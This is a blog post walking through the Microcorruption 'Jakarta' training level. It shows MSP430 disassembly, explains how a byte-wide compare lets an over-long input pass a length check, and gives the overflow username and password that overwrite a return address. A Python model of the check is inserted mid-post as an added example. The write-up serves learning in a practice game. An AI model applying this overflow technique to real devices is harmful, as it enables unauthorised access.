Monday, September 14, 2015

Microcorruption - Jakarta


JAKARTA

Again we see that at the very end of the main sequence we have the following bits of code where 0x22 is added to the stack pointer and then we return to that point indicated by the stack pointer:

4626:  3f40 4245      mov   #0x4542 "That password is not correct.", r15
462a:  b012 c846      call  #0x46c8 <puts>
462e:  3150 2200      add   #0x22, sp
4632:  3b41           pop   r11
4634:  3041           ret


As before we should be able to inject our code, overflow the stack and leave our desired address on the stack. 

Username  stored at 0x3ff2
Password  stored at <end of username>
Return    stored at 0x4016  - address to return to is 0x4440 (clears r15 then prog stop)


A username of regular characters that is too long triggers a password too long error.

The length of the username is determined within puts (0x46c8) and the resulting length is popped into r11.

This loop starts counting at 0x2401 (temporary memory storage) and measures how long the password is:

45ee:  3f40 0124      mov   #0x2401, r15
45f2:  1f53           inc   r15                    ; <-- loop top
45f4:  cf93 0000      tst.b 0x0(r15)               ;     test the byte at r15
45f8:  fc23           jnz   #0x45f2 <login+0x92>   ; --> loop while not NUL
45fa:  3f80 0224      sub   #0x2402, r15           ; total is ... ?
45fe:  0f5b           add   r11, r15               ; now add the two together for total length
4600:  7f90 2100      cmp.b #0x21, r15             ; r15 - #0x21 and set some flags ...
4604:  0628           jnc   #0x4612 <login+0xb2>   ; if no carry, jump to fail

But cmp.b is a byte compare, so only the low byte of r15 is being checked. The combined length in r15 therefore passes as long as its low byte falls in 0x00 to 0x20, and a total of 0x101 satisfies that just as well as 0x01...

So as a starting plan: fill the space with garbage, except for address 0x4016 (which is 35 bytes in from the start). The username itself has to be less than 0x20 (32) and the password length combined with the username length has to be 0x101 (257), so the password has to be 0xE1 (225) characters long.
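To make the truncation concrete, here is an added Python model of the length check above (my code, not part of the original post or of the Microcorruption firmware). It mirrors `cmp.b #0x21, r15` on the 16-bit sum of the two string lengths, puts the full-width compare the firmware should have used beside it, and enumerates which password lengths slip through for the 32-character username the plan uses. The immediate 0x21 and the register width are taken from the disassembly; the function names are my own.

```python
# Added example: model of the byte-wide length check in the Jakarta login routine.
# The firmware computes total = strlen(username) + strlen(password) in r15 (16 bits)
# and then executes cmp.b #0x21, r15, which only compares the low byte of r15.

LIMIT = 0x21  # immediate operand of the cmp.b instruction in the disassembly


def truncated_check_passes(username_len: int, password_len: int) -> bool:
    """Mirror of the firmware check: only the low byte of the 16-bit sum is compared."""
    total = (username_len + password_len) & 0xFFFF  # r15 is a 16-bit register
    low_byte = total & 0xFF                          # cmp.b sees only this byte
    return low_byte < LIMIT


def full_width_check_passes(username_len: int, password_len: int) -> bool:
    """The check as it should be: a word compare (cmp, not cmp.b) on the whole sum."""
    total = (username_len + password_len) & 0xFFFF
    return total < LIMIT


def lengths_that_slip_through(username_len: int, max_password_len: int = 0xFF) -> list:
    """Password lengths (up to max_password_len) that the truncated check accepts
    although the full-width check would reject them, i.e. inputs that overrun the
    budget the check was meant to enforce."""
    return [
        p for p in range(max_password_len + 1)
        if truncated_check_passes(username_len, p)
        and not full_width_check_passes(username_len, p)
    ]


if __name__ == "__main__":
    # Values from the plan above: 32-character username, 225-character password.
    user_len, pass_len = 32, 225
    total = user_len + pass_len
    print(f"total length = {total} (0x{total:x}), low byte = 0x{total & 0xFF:02x}")
    print("cmp.b check passes :", truncated_check_passes(user_len, pass_len))
    print("word compare passes:", full_width_check_passes(user_len, pass_len))
    print("password lengths accepted only because of truncation:",
          lengths_that_slip_through(user_len))
```

With the plan's lengths the sum is 0x101, whose low byte 0x01 is below 0x21, so the byte compare accepts 257 bytes of input while a word compare would have rejected anything from 33 upward; every password length from 224 to 255 passes for the same reason.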

Let's try the following:
---------------------------------------------------------------------------------
username: aaaaaaaaaabbbbbbbbbbccccccccccdd
password: aaaaLDaaaaaabbbbbbbbbbccccccccccddddddddddeeeeeeeeeeffffffffffgggggggggghhhhhhhhhhiiiiiiiiiijjjjjjjjjjaaaaaaaaaabbbbbbbbbbccccccccccddddddddddeeeeeeeeeeffffffffffgggggggggghhhhhhhhhhiiiiiiiiiijjjjjjjjjjaaaaaaaaaabbbbbbbbbbcccc


33,836 cycles


But we can recycle our old code to do better cyclewise …
